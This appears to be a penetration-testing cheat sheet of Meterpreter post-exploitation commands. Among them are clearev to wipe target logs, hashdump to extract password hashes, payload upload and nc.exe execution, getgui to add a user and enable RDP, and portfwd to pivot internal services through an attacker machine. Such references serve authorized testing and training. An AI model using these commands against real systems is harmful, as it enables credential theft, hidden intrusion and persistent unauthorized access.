This sheet contains commands often issued via a Meterpreter shell.
- Use the
background
command to send the shell session into the background. - Use the
sessions -l
to list the active sessions - Use
session -i (NUMBER)
to interact with a session of ID (NUMBER)
Use clearev
to clear the target system's logs.
- Use
download C:\boot.ini
to download a file from the target - Use the
upload
command to upload a payload or file to the target system - Use
pwd
andcd
to navigation the target's file system - Use
edit
to open vim with a fie on teh target server - Use
search
to search the file system in agrep -R
, orfind
, style.
- Use
execute C:\nc.exe
command to execute the command on the file system.
- Use
hashdump
to get the NT/LM hashes from the target system. - Use
idletime
to display how long the currently logged in user has been idle at the taregt system. - Use
ipconfig
to get Network Information from the target system.
- Use the
migrate
command to migrate the meterpreter shell to another PID. This will inherit the PID's effective User ID.
- Use
run getgui -u (UID) -p (PASSWD)
to create a user and enbale RDP on a compromised machine.
The portfwd
command can be used to forward a port of on your attacker machine to an iunternal service on the target system. If a service is running on localhost (127.0.0.1) on the taregt system, we can make it publically accessible through our attacker machine with the following command and syntax,
meterpreter> portfwd add -l (PORT ON ATTACKER MACHINE) -p (PORT ON TARGET MACHINE) -r (IP ADDRESS ON TARGET SYSTEM)
For example, if a service is running on an internal port, like MySQL on 3306 running on 127.0.0.1 cannot be accessible via the public IP address. We can think of it as running on the loopback adapter and not eth0, for example.
meterpreter> portfwd add -l 3307 -p 3306 -r 10.10.10.254
The above command will fwd all traffic to my attacker system going to port 3307 to the internal service on the target system to port 3306 on the target's 127.0.0.1 lo.